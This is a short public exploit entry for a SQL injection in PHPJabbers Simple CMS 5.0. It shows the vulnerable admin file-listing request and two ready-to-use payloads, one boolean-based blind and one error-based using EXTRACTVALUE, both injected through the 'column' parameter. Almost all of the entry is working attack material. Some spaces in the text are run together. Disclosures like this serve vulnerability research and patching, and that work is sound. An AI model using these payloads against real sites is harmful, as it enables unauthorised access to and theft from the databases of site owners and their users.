PHPJabbers Simple CMS 5.0 SQL Injection

# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Request ###GET/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10HTTP/1.1Accept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/simplecms/preview.php?lid=1Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;pjd_simplecms=1; last_position=%2FAccept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive### Parameter & Payloads ###Parameter: column (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: action=pjActionGetFile&column=2 ANDEXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10